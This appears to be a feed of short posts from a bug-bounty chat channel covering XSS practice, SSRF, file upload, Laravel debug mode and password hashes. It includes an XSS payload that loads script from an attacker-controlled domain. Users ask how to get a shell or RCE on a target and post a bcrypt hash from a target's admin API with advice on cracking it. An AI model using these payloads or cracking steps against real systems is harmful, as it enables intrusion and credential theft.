Talk and help about bugbounty
https://blog.intigriti.com/hackademy/xss-challenges/
Читать полностью…is it better to test skills on live bug bounty targets rather than searching for xss challenges?
Читать полностью…I want to test my XSS skills. Any good challenges after / other than Portswigger, Pico ctf, Hacker101?
Читать полностью…на целый
https://pentestbook.six2dez.com/
https://pentestbook.six2dez.com/others/web-checklist
https://youtu.be/4FTGkTSBawI
Offering private classes in Ethical Hacking, Bug Bounty, Pen Testing, etc… for anyone who’s interested! DM if you have any questions or visit my website:
https://zerodaysec.tech
I tried ssrf with the aws ip for the meta info it shows nothing
Читать полностью…any workaround for this??
payload : <script/src=“my.xss.domain”>
https://youtu.be/iqC4DqHwzUE?si=896JNmdqe4tbMMWp
Читать полностью…cracked softwares are considered more secure than original softwares ??
Читать полностью…The chance to get it is lower than 1% but it worth 10 min trying
Читать полностью…I get from some admin page api and this is bcrypt hash so can I decrypt this guys
Читать полностью…You can just Google all the CVEs related to Laravel or you can check Hackerone and other reports for the same
Читать полностью…How much you practice more you become stronger... try both
Читать полностью…does intigriti have labs or you mean programs on intigriti?
Читать полностью…Вот вам половина чек листа по Пентесту) (Попозже скину вторую половину)
#web
This will come in p5 if you don't show much of the impact like reverse shell
Читать полностью…Try to play with extension, maybe you will get something out of it
Читать полностью…I was able to upload any kind of restricted file to aws cloud of the target domain
Does anyone know how to upload a shell or gain rce from this !
I tried uploading php file but it displays the code inside it
Hey, listen. I've prepared a full course on bug bounty with over 80 high-quality videos, but I have absolutely no idea how to sell it. If anyone can help me sell this, please DM me. I'm willing to share 50-50.
Читать полностью…hello! Operator 'IN' requires two operands. <—- sql injection?
Читать полностью…Try hashing some of the most common password using md5 or sha256 and if u get the same hash u know the password
Читать полностью…This is a hash. Not an encryption. Hash works in one way unlike encryption. Hashes are not specifically made keeping decryption in mind. The only way to find the original string is to try all the possible outcomes tirelessly. (Hypothetical)
Читать полностью…$2y$10$Eh7dkp8wvDBnWWZlAJE1KOvJwArVGqvsyXgeAzXmhe5EAnEPt5cV2
Читать полностью…I found one website that enable laravel debug option is there any way to exploit this?
Читать полностью…